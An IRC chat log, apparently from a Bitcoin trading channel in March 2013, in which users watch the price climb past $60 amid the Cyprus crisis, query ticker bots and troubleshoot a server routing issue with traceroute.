16:15:58 they nuked parliament here Mar 19 16:16:05 wheres here? Mar 19 16:16:13 slovenia Mar 19 16:16:26 thats a real country? Mar 19 16:16:35 no, NSK is real Mar 19 16:16:50 at any rate, I havent seen any news about slovenia Mar 19 16:16:51 but I dont doubt it Mar 19 16:17:00 but wait until it starts happening in germany Mar 19 16:17:04 and berlin gets burned to the ground Mar 19 16:17:13 you have no clue whats happenin here Mar 19 16:17:15 then you will understand what I mean by "europe is fucked" Mar 19 16:17:16 germany is doing just fine Mar 19 16:17:31 germany WILLL do just fine if they exit the EU now Mar 19 16:17:37 and issue their own currency Mar 19 16:18:13 diablo tokens. Mar 19 16:18:23 ;;asks 55 Mar 19 16:18:28 There are currently 2559.549 bitcoins offered at or under 55.0 USD, worth 140775.164133 USD in total. | Data vintage: 0.0011 seconds Mar 19 16:18:51 germany switches to bitcoin Mar 19 16:18:55 [BTCTC] [B.YABMC] 1 @ 0.01959 BTC [+] Mar 19 16:18:58 [BTCTC] [B.YABMC] 40 @ 0.019599 = 0.784 BTC [+] Mar 19 16:19:00 [BTCTC] [B.YABMC] 10 @ 0.01966 = 0.1966 BTC [+] Mar 19 16:19:04 [BTCTC] [B.YABMC] 239 @ 0.01985 = 4.7442 BTC [+] Mar 19 16:19:07 mjr_: unlikely Mar 19 16:19:08 [BTCTC] [B.YABMC] 40 @ 0.01988 = 0.7952 BTC [+] Mar 19 16:19:12 lol it was a joke Mar 19 16:19:21 did not think that was likely Mar 19 16:19:32 iceland should switch to bitcoin Mar 19 16:19:42 it's a small country with many internet users Mar 19 16:19:54 iceland dealt with their credit issues in a great way for their people Mar 19 16:20:02 more people should have followed their example Mar 19 16:20:21 I agree Mar 19 16:20:23 iceland won Mar 19 16:20:28 [BTCTC] [B.YABMC] 1 @ 0.008 BTC [-] Mar 19 16:20:29 they crashed the banks and press the reset button Mar 19 16:23:19 that is what should happen Mar 19 16:23:25 you lent money to a bad risk Mar 19 16:23:29 that is your fault not mine Mar 19 16:23:56 it is basically predatory lending when you let someone borrow 10x their income and networth Mar 19 16:28:47 wall is taking hits Mar 19 16:28:49 ;;asks 55 Mar 19 16:28:49 There are currently 1883.3806 bitcoins offered at or under 55.0 USD, worth 103577.890673 USD in total. | Data vintage: 55.7350 seconds Mar 19 16:29:04 ;;asks 55 Mar 19 16:29:05 There are currently 1883.3806 bitcoins offered at or under 55.0 USD, worth 103577.890673 USD in total. | Data vintage: 71.5866 seconds Mar 19 16:30:16 [BTCTC] [PAJKA.BOND] 1 @ 0.105 BTC [-] Mar 19 16:30:57 [MPEX] [S.MPOE] 14850 @ 0.00075897 = 11.2707 BTC [-] Mar 19 16:31:54 less than 1k now Mar 19 16:33:32 bfl miner first testing Mar 19 16:33:33 http://www.blogiseverything.com/files/pics/usb_powered_cooking_pan_small.jpg Mar 19 16:35:49 and 55 is gone Mar 19 16:36:31 ;;asks 56 Mar 19 16:36:31 There are currently 1954.0553 bitcoins offered at or under 56.0 USD, worth 108167.701023 USD in total. | Data vintage: 88.7404 seconds Mar 19 16:36:40 ;;asks 60 Mar 19 16:36:40 There are currently 14347.373 bitcoins offered at or under 60.0 USD, worth 839553.401471 USD in total. | Data vintage: 98.1760 seconds Mar 19 16:45:45 ;;goxlag Mar 19 16:45:45 5.38259 seconds Mar 19 16:47:08 ''ticker Mar 19 16:47:13 ;;ticker Mar 19 16:47:13 BTCUSD ticker | Best bid: 55.66000, Best ask: 55.70000, Bid-ask spread: 0.04000, Last trade: 55.66000, 24 hour volume: 102733.91362795, 24 hour low: 47.50002, 24 hour high: 56.00000, 24 hour vwap: 50.91918 Mar 19 16:47:40 and the hill is down again... Mar 19 16:51:59 next stop, $50 or $60? Mar 19 16:52:47 [MPEX] [O.BTCUSD.P750T] 1 @ 0.47606017 BTC [-] Mar 19 16:54:14 ThickAsThieves: $60 Mar 19 16:54:25 won't take long Mar 19 16:54:31 cyprusssss Mar 19 16:56:07 but theres bound to be some selloffs Mar 19 16:56:32 ;;goxlag Mar 19 16:56:33 0 seconds Mar 19 16:58:49 56 did not last long at all Mar 19 16:59:07 ;;asks 57 Mar 19 16:59:12 There are currently 955.56252 bitcoins offered at or under 57.0 USD, worth 54006.2376327 USD in total. | Data vintage: 0.0013 seconds Mar 19 16:59:24 ;;asks 60 Mar 19 16:59:24 There are currently 12557.116 bitcoins offered at or under 60.0 USD, worth 741836.013873 USD in total. | Data vintage: 12.1822 seconds Mar 19 17:01:55 ;;bids 56 Mar 19 17:01:56 There are currently 12071.718 bitcoins demanded at or over 56.0 USD, worth 677336.979852 USD in total. | Data vintage: 31.4974 seconds Mar 19 17:02:18 just as many bids over 56 as asks to 60, jesus h christ Mar 19 17:02:56 ;;bids 56 Mar 19 17:02:57 There are currently 12071.718 bitcoins demanded at or over 56.0 USD, worth 677336.979852 USD in total. | Data vintage: 92.4568 seconds Mar 19 17:03:26 http://bitcoincharts.com/charts/mtgoxUSD/accumulated_orderbook.png Mar 19 17:03:47 damn Mar 19 17:04:13 holy sheet Mar 19 17:04:19 hehe Mar 19 17:04:25 look at that ask wall Mar 19 17:04:31 ;;asks 56 Mar 19 17:04:31 There are currently 0 bitcoins offered at or under 56.0 USD, worth 0.0 USD in total. | Data vintage: 8.0772 seconds Mar 19 17:04:34 bid Mar 19 17:04:38 ;;bids 56 Mar 19 17:04:38 There are currently 369.55094 bitcoins demanded at or over 56.0 USD, worth 20755.939292 USD in total. | Data vintage: 14.8987 seconds Mar 19 17:04:53 ok Mar 19 17:04:55 its gone Mar 19 17:04:55 they took the wall down Mar 19 17:04:59 but it waws there Mar 19 17:05:01 I guess he is just gonna buy it Mar 19 17:05:10 that wall would never work anyway Mar 19 17:05:11 56.9 Mar 19 17:05:15 people would just buy over it Mar 19 17:05:25 unless there was a big dump Mar 19 17:05:30 actually it might work Mar 19 17:05:44 Yah, I think we hit $60 within the hour Mar 19 17:06:25 ;;bc,convert eur Mar 19 17:06:26 1 BTC = 56.90000 U.S. dollars = 43.9925777 Euros Mar 19 17:08:00 "Theymos I am a 21-year-old computer science student from Wisconsin." Mar 19 17:08:03 wat? Mar 19 17:08:11 Is he just trolling people? Mar 19 17:08:18 57.50 Mar 19 17:08:31 $60 Mar 19 17:08:33 ! Mar 19 17:08:34 no and hashking is 13 Mar 19 17:08:43 lol Mar 19 17:08:45 $60.29 Mar 19 17:08:52 that wall was not sold into, he took it down Mar 19 17:08:56 what are we just spitting out random numbers now? Mar 19 17:08:58 30242.31 Mar 19 17:09:00 no Mar 19 17:09:02 thats the price Mar 19 17:09:04 of bitcoin Mar 19 17:09:04 now Mar 19 17:09:08 bugpowder last i heard he was 20, so it checks out Mar 19 17:09:19 he market bought with the wall Mar 19 17:09:19 ;;goxlag Mar 19 17:09:20 21.857546 seconds Mar 19 17:09:24 ;;ticker Mar 19 17:09:25 BTCUSD ticker | Best bid: 56.75001, Best ask: 56.88000, Bid-ask spread: 0.12999, Last trade: 56.75001, 24 hour volume: 104957.41050327, 24 hour low: 47.51000, 24 hour high: 57.00000, 24 hour vwap: 51.04947 Mar 19 17:09:40 ah ok Mar 19 17:09:48 clark moody caught it Mar 19 17:09:49 kakobreka is hashking really 13? i thought that was just a joke Mar 19 17:09:49 sorry for jumping on ya. Mar 19 17:09:53 last $60.09 Mar 19 17:10:07 Chaang-Noi yeah we thought so too Mar 19 17:10:33 lol Mar 19 17:10:41 oh lol, i should have known when he called me a scammer for not paying him dividends on my bonds cuz he had already sold them... lolol btcland Mar 19 17:10:43 tradehill has one order to sell at $3000 Mar 19 17:11:03 ;;goxlag Mar 19 17:11:04 34.77577 seconds Mar 19 17:11:08 dayum Mar 19 17:11:13 jesus! Mar 19 17:11:14 jesus fuck Mar 19 17:11:28 62 Mar 19 17:11:32 this is some crazy shit Mar 19 17:11:49 Chaang-Noi hows litecoin doin Mar 19 17:11:56 well atleast that wall at 60 is gone, a small one at 64 Mar 19 17:12:20 Glad I bought those calls Mar 19 17:12:23 kakobreka .0095 so up esp considering btc is moving uup Mar 19 17:12:30 lol Mar 19 17:12:31 I think 62 is a bad print Mar 19 17:12:31 yeah Mar 19 17:12:39 nmc is also up concidering btc Mar 19 17:12:44 so great! Mar 19 17:12:45 $1 spread Mar 19 17:12:48 ;;ask 60 Mar 19 17:12:48 Error: "ask" is not a valid command. Mar 19 17:12:55 ;;asks 60 Mar 19 17:12:55 There are currently 0 bitcoins offered at or under 60.0 USD, worth 0.0 USD in total. | Data vintage: 79.4836 seconds Mar 19 17:13:00 ;;asks 70 Mar 19 17:13:00 There are currently 15933.287 bitcoins offered at or under 70.0 USD, worth 1064561.16994 USD in total. | Data vintage: 84.4513 seconds Mar 19 17:13:11 ;;asks 62 Mar 19 17:13:12 There are currently 48.927719 bitcoins offered at or under 62.0 USD, worth 2985.0757865 USD in total. | Data vintage: 95.8431 seconds Mar 19 17:13:16 ;;asks 65 Mar 19 17:13:16 There are currently 6238.7322 bitcoins offered at or under 65.0 USD, worth 397953.724648 USD in total. | Data vintage: 100.6715 seconds Mar 19 17:13:28 ;;goxlag Mar 19 17:13:28 68.980126 seconds Mar 19 17:13:30 hmm... maybe it did hit it, I never saw that trade happen though Mar 19 17:13:34 dang Mar 19 17:13:41 yeah it says it hit 62.0 Mar 19 17:15:32 well 54 coins are offered at or under 62 Mar 19 17:15:38 ;;asks 62 Mar 19 17:15:38 There are currently 1060.2704 bitcoins offered at or under 62.0 USD, worth 64880.7926418 USD in total. | Data vintage: 108.6023 seconds Mar 19 17:15:43 well now more... Mar 19 17:16:38 ;;goxlag Mar 19 17:16:40 81.443292 seconds Mar 19 17:17:20 wow $3 cheaper on bitfloor Mar 19 17:17:30 2013-03-19 11:02:23 to 2013-03-19 11:12:23: Avg price: 58.566 (56.200 to 62.000) Total volume: 8586.48399, Cumulative cost: 511324.00000 Buy volume: 7933.77667 (473468.31 USD), Sell volume: 652.70731 (37856.53 USD) Ratio: 12.15518 ( 12.51) Mar 19 17:17:34 falling fast Mar 19 17:17:40 58.5 Mar 19 17:17:42 1/2 million fiat dump in 10 mins Mar 19 17:17:52 ;;goxlag Mar 19 17:17:53 114.508129 seconds Mar 19 17:17:59 almost two minutes now Mar 19 17:18:16 i have a live coinlab connection Mar 19 17:18:22 for now... Mar 19 17:18:33 60.20 Mar 19 17:19:30 57 Mar 19 17:19:41 and now for some reality Mar 19 17:19:54 $4 spread Mar 19 17:19:59 its jumping around Mar 19 17:20:04 buy at 62 sell at 56 lol Mar 19 17:20:13 $6 spread i mean Mar 19 17:20:19 shit i think itll stabilize Mar 19 17:20:21 [MPEX] [S.MPOE] 21367 @ 0.0007343 = 15.6898 BTC [-] Mar 19 17:20:23 [MPEX] [S.MPOE] 4783 @ 0.00073344 = 3.508 BTC [-] Mar 19 17:20:37 ;;goxlag Mar 19 17:20:37 111.972092 seconds Mar 19 17:20:39 ;;goxlag Mar 19 17:20:40 107.616952 seconds Mar 19 17:20:44 59.8 Mar 19 17:21:06 so much for 47.5 is the new 5 Mar 19 17:21:13 ;;goxlag Mar 19 17:21:14 121.500977 seconds Mar 19 17:22:11 ;;goxlag Mar 19 17:22:11 135.48409 seconds Mar 19 17:22:22 [BTCTC] [ASICMINER-PT] 1 @ 0.829 BTC [-] Mar 19 17:22:24 [BTCTC] [ASICMINER-PT] 2 @ 0.828 = 1.656 BTC [-] Mar 19 17:22:26 [BTCTC] [ASICMINER-PT] 1 @ 0.8222 BTC [-] Mar 19 17:22:32 [BTCTC] [ASICMINER-PT] 10 @ 0.8221 = 8.221 BTC [-] Mar 19 17:23:32 ;;goxlag Mar 19 17:23:33 122.409422 seconds Mar 19 17:24:39 ;;goxlag Mar 19 17:24:39 29.120795 seconds Mar 19 17:27:13 57 to 62 to 57 lol Mar 19 17:28:54 ;;asks 62 Mar 19 17:28:54 There are currently 4093.7415 bitcoins offered at or under 62.0 USD, worth 248124.847411 USD in total. | Data vintage: 92.1101 seconds Mar 19 17:29:06 ;;bids 57 Mar 19 17:29:06 There are currently 106.35268 bitcoins demanded at or over 57.0 USD, worth 6093.23499578 USD in total. | Data vintage: 104.3026 seconds Mar 19 17:29:11 ;;bids 56 Mar 19 17:29:11 There are currently 1398.1248 bitcoins demanded at or over 56.0 USD, worth 78641.1004811 USD in total. | Data vintage: 109.2912 seconds Mar 19 17:29:16 ;;bids 55 Mar 19 17:29:16 There are currently 3118.6452 bitcoins demanded at or over 55.0 USD, worth 173403.849411 USD in total. | Data vintage: 114.0207 seconds Mar 19 17:34:32 ;;ticker Mar 19 17:34:33 BTCUSD ticker | Best bid: 57.56000, Best ask: 57.61000, Bid-ask spread: 0.05000, Last trade: 57.61000, 24 hour volume: 122812.31066450, 24 hour low: 47.51000, 24 hour high: 62.00000, 24 hour vwap: 52.26281 Mar 19 17:35:04 ;;calc (52.26281-41)/52.26281 Mar 19 17:35:04 0.215503337842 Mar 19 17:37:57 [BTCTC] [COGNITIVE] 21 @ 0.2 = 4.2 BTC [-] Mar 19 17:39:22 [BTCTC] [COGNITIVE] 1 @ 0.18 BTC [-] Mar 19 17:39:24 [BTCTC] [COGNITIVE] 1 @ 0.16002 BTC [-] Mar 19 17:39:55 ;;goxlag Mar 19 17:39:56 0 seconds Mar 19 17:40:25 [BTCTC] [PAJKA.BOND] 3 @ 0.105 = 0.315 BTC [-] Mar 19 17:40:40 [BTCTC] [BTC-TRADING-PT] 10 @ 0.2309 = 2.309 BTC [+] Mar 19 17:41:46 fifty seven! Mar 19 17:42:01 i wake up to this nonsense. Mar 19 17:42:05 every day. Mar 19 17:42:14 total bid: 7,756,029 USD | total ask: 52,027 BTC | ratio: 149.08 USD/BTC Mar 19 17:42:44 [BTCTC] [GSDPT] 50 @ 0.004231 = 0.2116 BTC [-] Mar 19 17:43:00 and goodness i see we were trading all the way up to 62 Mar 19 17:43:30 [BTCTC] [PAJKA.BOND] 2 @ 0.105 = 0.21 BTC [-] Mar 19 17:44:13 benkay yeah, massive walls down in one go, this is a correction to that, we will be up to 65 shortly, make sure your seatbelts are on Mar 19 17:46:24 [BTCTC] [CRYPTO-TRADE] 8 @ 0.2 = 1.6 BTC [+] Mar 19 17:51:36 ;;asks 40 Mar 19 17:51:37 There are currently 0 bitcoins offered at or under 40.0 USD, worth 0.0 USD in total. | Data vintage: 77.0844 seconds Mar 19 17:51:40 heh. Mar 19 17:54:24 [BTCTC] [PAJKA.BOND] 1 @ 0.105 BTC [-] Mar 19 17:55:51 ;;asks 59 Mar 19 17:55:56 There are currently 14.925743 bitcoins offered at or under 59.0 USD, worth 880.61884113 USD in total. | Data vintage: 0.0009 seconds Mar 19 17:56:02 ;;asks 62 Mar 19 17:56:02 There are currently 4151.5081 bitcoins offered at or under 62.0 USD, worth 251811.333797 USD in total. | Data vintage: 6.3287 seconds Mar 19 17:56:09 ;;bids 55 Mar 19 17:56:10 There are currently 4312.4797 bitcoins demanded at or over 55.0 USD, worth 240297.179135 USD in total. | Data vintage: 13.6690 seconds Mar 19 17:56:17 nice Mar 19 17:57:15 [BTCTC] [ASICMINER-PT] 1 @ 0.8647 BTC [+] Mar 19 18:00:19 [BTCTC] [GOLD] 1 @ 0.295 BTC [-] Mar 19 18:01:36 is there a market cap command? Mar 19 18:02:10 no but its like 10900000 time 58 Mar 19 18:02:25 so around 600 million Mar 19 18:03:04 i'm more interested in plotting asicminer mktcap over time Mar 19 18:03:31 ;;asks 100 Mar 19 18:03:36 There are currently 38868.333 bitcoins offered at or under 100.0 USD, worth 2888163.25634 USD in total. | Data vintage: 0.0021 seconds Mar 19 18:03:52 asks 200 Mar 19 18:03:55 ;;asks 200 Mar 19 18:03:56 There are currently 42540.219 bitcoins offered at or under 200.0 USD, worth 3435013.85974 USD in total. | Data vintage: 20.0105 seconds Mar 19 18:06:09 benkay: market cap is visible at http://www.bitcoincharts.com/bitcoin/ Mar 19 18:06:59 thanks unbalanced, i'm more interested in mktcap on a per-asset basis Mar 19 18:07:31 has anyone done any work on the performance of bitcoin assets relative to bit coin? Mar 19 18:11:56 holding BTC is better unless you are extremely plugged into the assets you are buying selling. for the average bitcoiner, anyhow. Mar 19 18:12:19 hooooooooooooooooooooolf Mar 19 18:12:22 for a long long time Mar 19 18:12:23 for a long long time Mar 19 18:12:36 assets, you mean? Mar 19 18:12:50 i'm holding some for a long long time. just as an experimento Mar 19 18:13:23 deadweasel i have a hunch you're right Mar 19 18:13:28 but Mar 19 18:13:34 "in god we trust. all others must bring data." Mar 19 18:14:03 true, I have run no numbers on that. It's my gut feeling. Mar 19 18:14:30 i'm fairly sure I could make the data say what I want it to say, if I really tried, so I just go with my gut Mar 19 18:14:48 data doesn't lie, but people do. :) Mar 19 18:16:35 i like charting things Mar 19 18:16:50 more accurately, charting stuff is a thing that i like to do Mar 19 18:17:13 how is that more accurate? Mar 19 18:17:18 fun_things.append(charting) Mar 19 18:17:30 don't hold me to that Mar 19 18:17:31 lol.stuff() Mar 19 18:17:46 i'm sitting on a train and the coffee place is closed Mar 19 18:17:46 [BTCTC] [PAJKA.BOND] 3 @ 0.105 = 0.315 BTC [-] Mar 19 18:18:18 well, grab price history and build a scenario tool and see if you can get historical data on assets and get busy! Mar 19 18:18:25 i'm curious Mar 19 18:18:40 too busy building real thing Mar 19 18:18:47 only making charts that i need to make Mar 19 18:19:02 reminds me, I need to do some work. thx! Mar 19 18:19:02 price history for asicminer does not return on time invested have at the moment Mar 19 18:21:10 don't do it Mar 19 18:22:34 ;;bc,stats Mar 19 18:22:36 Current Blocks: 226774 | Current Difficulty: 4847647.152065606 | Next Difficulty At Block: 227807 | Next Difficulty In: 1033 blocks | Next Difficulty In About: 5 days, 7 hours, 8 minutes, and 18 seconds | Next Difficulty Estimate: 6214082.21368 | Estimated Percent Change: 28.18759 Mar 19 18:22:44 there ya go Enky Mar 19 18:23:16 ? Mar 19 18:25:06 28%?! Yikes. Mar 19 18:25:48 7.38 minutes avg between blocks... Mar 19 18:26:18 lots of hardware came online in the last 9 days... Mar 19 18:26:22 gotta get it back to 10 Mar 19 18:26:41 ;;goxlag Mar 19 18:26:41 21.865695 seconds Mar 19 18:26:49 [MPEX] [S.MPOE] 5800 @ 0.00073866 = 4.2842 BTC [+] Mar 19 18:27:14 ;;ticker --last Mar 19 18:27:14 56.89000 Mar 19 18:30:03 55 gone Mar 19 18:33:07 that was a fun ride Mar 19 18:35:34 anyone heard from topace? Mar 19 18:35:53 hi Mar 19 18:36:19 howdy Mar 19 18:36:25 weird routing issue Mar 19 18:36:27 cant figure it out Mar 19 18:36:44 soemone traceroute 198.41.28.231 for me ? Mar 19 18:37:15 i lose the route at hop 32... looks like jupiter or uranus Mar 19 18:37:43 6 border1-faste2-0.magma.ca (209.217.64.38) 46.098 ms 24.215 ms 24.056 ms Mar 19 18:37:43 7 border5-faste0-0.magma.ca (209.217.64.42) 25.576 ms 27.031 ms 28.733 ms Mar 19 18:37:43 8 198.32.235.40 (198.32.235.40) 30.663 ms 32.602 ms 33.566 ms Mar 19 18:37:43 9 173-195-50.214.tel-ott.com (173.195.50.214) 42.963 ms 45.431 ms 46.764 ms Mar 19 18:37:43 10 198.41.28.231 (198.41.28.231) 48.645 ms 50.038 ms 51.511 ms Mar 19 18:37:48 should come in like that Mar 19 18:37:53 which it does for me from my office Mar 19 18:38:04 but from othe rlocations, its crapping out somewhere as well Mar 19 18:38:25 hop 13, after 38.122.68.178 Mar 19 18:38:27 for me Mar 19 18:39:11 yea thast the IP it stops on for me from one of my other servers Mar 19 18:39:38 how do you tell customers "the server is fine, its just the routing thats fucked up" Mar 19 18:39:58 when most customers say "whats a server? whats a route?" Mar 19 18:40:11 topace__: You tell them to contact their ISP and provide them the last hop. Mar 19 18:40:13 you say server is us, route is you Mar 19 18:40:18 we = ok, you = fucked. Mar 19 18:40:42 if my experience with bitcoin business is of any value, you should ignore the customer until the issue is fixed Mar 19 18:40:49 i hear it all the time one way or another as "it works on my box" usually from the developer Mar 19 18:40:53 then possibly continue ignoring after said fixing Mar 19 18:41:12 "it works in my local environment" Mar 19 18:41:17 fuck your local environment Mar 19 18:41:26 oh mmm 38.122.68.178 is my data center... Mar 19 18:41:33 lol topace__ Mar 19 18:41:36 haha Mar 19 18:41:42 wonder why traceroute doesnt go through that when i traceroute from my office Mar 19 18:41:51 must be coming in on a different network Mar 19 18:42:47 ;;goxlag Mar 19 18:42:47 69.287552 seconds Mar 19 18:42:55 ;;ticker Mar 19 18:42:56 BTCUSD ticker | Best bid: 55.01000, Best ask: 55.44999, Bid-ask spread: 0.43999, Last trade: 55.00000, 24 hour volume: 131954.29179881, 24 hour low: 47.52100, 24 hour high: 62.00000, 24 hour vwap: 52.64803 Mar 19 18:43:34 here comes the bounce... Mar 19 18:44:34 this might be 100% unrelated to the new switch i just installed yesterday, or it might be 100% because of the new switch Mar 19 18:44:35 lol Mar 19 18:44:41 :) Mar 19 18:44:47 but if the switch went in yesterday, why only fail this morning Mar 19 18:45:01 is it a managed switch? did you configure it? Mar 19 18:45:03 needed to warm up Mar 19 18:45:23 ye amanged switch Mar 19 18:45:25 catalyst 2960 Mar 19 18:45:34 [BTCTC] [ASICMINER-PT] 16 @ 0.8645 = 13.832 BTC [-] Mar 19 18:45:50 [MPEX] [S.MPOE] 22127 @ 0.00073344 = 16.2288 BTC [-] Mar 19 18:45:59 okay now traceroute to 198.41.28.228 Mar 19 18:46:05 [BTCTC] [ASICMINER-PT] 2 @ 0.8644 = 1.7288 BTC [-] Mar 19 18:46:06 (or .231) Mar 19 18:47:14 hops right through the server Mar 19 18:47:34 fucking data center Mar 19 18:48:29 site is working Mar 19 18:48:36 excellent Mar 19 18:49:19 ;;ticker Mar 19 18:49:20 BTCUSD ticker | Best bid: 56.64000, Best ask: 56.98000, Bid-ask spread: 0.34000, Last trade: 56.98000, 24 hour volume: 134791.46988100, 24 hour low: 47.54000, 24 hour high: 62.00000, 24 hour vwap: 52.73807 Mar 19 18:49:26 ;;goxlag Mar 19 18:49:26 !ticker h sdice Mar 19 18:49:26 63.835124 seconds Mar 19 18:49:28 [HAVELOCK:SDICE] 1D: 0.53010000 / 0.53168333 / 0.53200000 (6 shares, 3.19010000 BTC), 7D: 0.50030000 / 0.52350856 / 0.59999900 (1197 shares, 626.63975002 BTC), 30D: 0.37000000 / 0.59492594 / 0.75100000 (5740 shares, 3414.87486892 BTC) Mar 19 19:08:09 [MPEX] [S.MPOE] 9350 @ 0.00073744 = 6.8951 BTC [+] Mar 19 19:10:20 !l m s.dice Mar 19 19:10:21 Last trade for S.DICE on MPEX was at 0.0051 BTC [+] Mar 19 19:10:45 !l m s.bbet Mar 19 19:10:45 Last trade for S.BBET on MPEX was at 0.0018 BTC [+] Mar 19 19:11:40 [MPEX] [S.MPOE] 9537 @ 0.00073344 = 6.9948 BTC [-] Mar 19 19:11:41 [MPEX] [S.MPOE] 4663 @ 0.00073285 = 3.4173 BTC [-] Mar 19 19:22:07 [HAVELOCK] [SDICE] 2 @ 0.515 = 1.03 BTC [-] Mar 19 19:25:34 [BTCTC] [SYNERGY] 1 @ 0.00901 BTC [-] Mar 19 19:25:36 [BTCTC] [SYNERGY] 5 @ 0.009 = 0.045 BTC [-] Mar 19 19:30:11 "< mircea_popescu> miscounted them digits" << I made it easier to read $depth now Mar 19 19:30:28 ascii chart? Mar 19 19:31:32 $depth s.mpoe Mar 19 19:31:33 jurov: Bids: ['2462 @ 0.00073285', '41300 @ 0.00071998', '1590 @ 0.00071886', '32459 @ 0.00068249', '25000 @ 0.000675'] Mar 19 19:31:34 jurov: Asks: ['5074 @ 0.00073744', '5400 @ 0.00074837', '3950 @ 0.00075897', '13911 @ 0.00076091', '29878 @ 0.00076717'] Mar 19 19:31:51 $markov is it fixed Mar 19 19:31:52 jurov: (markov [] [word1 [word2]]) -- Returns a randomly-generated Markov Chain generated sentence from the data kept on (which is only necessary if not sent in the channel itself). If word1 and word2 are specified, they will be used to start the Markov chain. Mar 19 19:32:04 $markov "is it fixed" Mar 19 19:32:05 jurov: Error: I found a broken link in the Markov chain. Maybe I received two bad links to start the chain. Mar 19 19:32:10 [MPEX] [S.MPOE] 2462 @ 0.00073285 = 1.8043 BTC [-] Mar 19 19:32:11 [MPEX] [S.MPOE] 41300 @ 0.00071998 = 29.7352 BTC [-] Mar 19 19:32:21 [MPEX] [O.BTCUSD.P550N] 6 @ 0.34032895 = 2.042 BTC Mar 19 19:32:33 $markov rofl Mar 19 19:32:33 kakobrekla: Error: I found a broken link in the Markov chain. Maybe I received two bad links to start the chain. Mar 19 19:32:42 $markov you fail Mar 19 19:32:42 kakobrekla: Error: I found a broken link in the Markov chain. Maybe I received two bad links to start the chain. Mar 19 19:33:12 or what Mar 19 19:33:16 btw, it should consider first parameter a chan only if it begins with # Mar 19 19:33:24 its kinda rand(){return 4;} here Mar 19 19:36:52 ;;ticker Mar 19 19:36:53 BTCUSD ticker | Best bid: 55.90000, Best ask: 56.50000, Bid-ask spread: 0.60000, Last trade: 56.00000, 24 hour volume: 142528.78744713, 24 hour low: 47.55000, 24 hour high: 62.00000, 24 hour vwap: 52.90602 Mar 19 19:38:34 !exchanges bungeegum Mar 19 19:39:00 !ticker m s.ponzi Mar 19 19:39:02 Your actions are useless. Mar 19 19:39:18 !ticker glbse ppt.a Mar 19 19:39:19 I haven't understood a single word you've said since I met you, not one single word. Mar 19 19:39:27 !ticker GLBSE ppt.e Mar 19 19:39:28 I haven't understood a single word you've said since I met you, not one single word. Mar 19 19:39:31 eh Mar 19 19:39:36 !last GLBSE ppt.e Mar 19 19:39:37 Last trade for PPT.E on GLBSE was at 0.32 BTC [-] Mar 19 19:39:40 !last GLBSE ppt.a Mar 19 19:39:40 Last trade for PPT.A on GLBSE was at 0.32 BTC [+] Mar 19 19:39:43 hm Mar 19 19:39:47 !last GLBSE ppt.b Mar 19 19:39:47 Last trade for PPT.B on GLBSE was at 0.32 BTC [+] Mar 19 19:39:56 kinda strange Mar 19 19:44:31 maybe it fails when no recent data Mar 19 19:44:46 anyway, better error messages would be helpful Mar 19 19:45:03 no its not a fail Mar 19 19:45:12 !last GLBSE fake Mar 19 19:45:13 How can I be of assistance, my poor man? Mar 19 19:45:13 !fail Mar 19 19:45:14 see Mar 19 19:45:34 i dont fail Mar 19 19:45:36 see Mar 19 19:45:56 so when i name the exchange right, assbot is polite? Mar 19 19:46:06 lol Mar 19 19:46:19 assbot is polite all the time Mar 19 19:46:28 !last GLBSE SATOSHISDAEMON.horse Mar 19 19:46:29 Have you got any tobacco? Mar 19 19:46:39 smickles, you around Mar 19 19:46:41 i might not have that. Mar 19 19:46:45 cause too old Mar 19 19:46:46 not sure Mar 19 19:47:11 !ticker btct bitvps Mar 19 19:47:14 [BTCT:BITVPS] 1D: -- / -- / -- (0 shares, 0 BTC), 7D: 0.0038 / 0.00473 / 0.00688 (350 shares, 1.7 BTC), 30D: 0.00341 / 0.00438 / 0.00689 (1105 shares, 4.8 BTC) Mar 19 19:47:18 meat: http://coinbits.com/wp-content/uploads/2012/04/ee74sd-300x224.jpg Mar 19 19:47:44 dunno where it ended Mar 19 19:48:09 on a 10k pizza as horse salami Mar 19 19:49:02 [BTCTC] [RSM] 1 @ 0.00672 BTC [-] Mar 19 19:49:04 [BTCTC] [RSM] 3 @ 0.00671 = 0.0201 BTC [-] Mar 19 19:49:06 [BTCTC] [RSM] 37 @ 0.006 = 0.222 BTC [-] Mar 19 19:49:14 [BTCTC] [RSM] 100 @ 0.0059 = 0.59 BTC [-] Mar 19 19:49:15 oh, list of biggest btc luminaries: https://bitcointalk.org/index.php?topic=141503.msg1642658#msg1642658 Mar 19 19:49:15 i'll be back later. thank you kakobrekla for the info :) Mar 19 19:49:16 [BTCTC] [RSM] 201 @ 0.00585 = 1.1759 BTC [-] Mar 19 19:49:23 yw bungeegum Mar 19 19:49:37 ;;ticker Mar 19 19:49:37 BTCUSD ticker | Best bid: 57.67786, Best ask: 57.89000, Bid-ask spread: 0.21214, Last trade: 57.67785, 24 hour volume: 143463.25501478, 24 hour low: 47.60000, 24 hour high: 62.00000, 24 hour vwap: 52.94004 Mar 19 19:49:38 ;;ticker Mar 19 19:49:38 BTCUSD ticker | Best bid: 57.67786, Best ask: 57.89000, Bid-ask spread: 0.21214, Last trade: 57.67785, 24 hour volume: 143463.25501478, 24 hour low: 47.60000, 24 hour high: 62.00000, 24 hour vwap: 52.94004 Mar 19 19:49:40 ;;goxlag Mar 19 19:49:40 0.542955 seconds Mar 19 19:50:05 250 paraipan Mar 19 19:50:05 250 Garr255 Mar 19 19:50:08 500 OgNasty Mar 19 19:50:09 ROFL Mar 19 19:50:42 someone should just send him to s.dice Mar 19 19:51:33 kakobrekla, how do you feel about a bet "At least one of bitcointalk treasurers will get scammer tag by...dunno when " Mar 19 19:51:43 1st July? Mar 19 19:51:57 [MPEX] [S.MPOE] 1590 @ 0.00071886 = 1.143 BTC [-] Mar 19 19:51:59 i feel good about it but i dont approve that stuff Mar 19 19:52:03 nah more Mar 19 19:52:06 by end 2013 Mar 19 19:52:16 okay Mar 19 19:53:08 [HAVELOCK] [HIM] 2 @ 1.985 = 3.97 BTC [-] Mar 19 19:53:09 [HAVELOCK] [HIM] 6 @ 2 = 12 BTC [+] Mar 19 20:01:57 ;;bc,stats Mar 19 20:01:59 Current Blocks: 226787 | Current Difficulty: 4847647.152065606 | Next Difficulty At Block: 227807 | Next Difficulty In: 1020 blocks | Next Difficulty In About: 5 days, 5 hours, 32 minutes, and 18 seconds | Next Difficulty Estimate: 6217631.41098 | Estimated Percent Change: 28.26081 **** BEGIN LOGGING AT Wed Mar 20 01:31:32 2013 Mar 20 01:31:52 ;;ticker Mar 20 01:31:52 did you notice the notice mircea_popescu ? Mar 20 01:31:55 BTCUSD ticker | Best bid: 59.84200, Best ask: 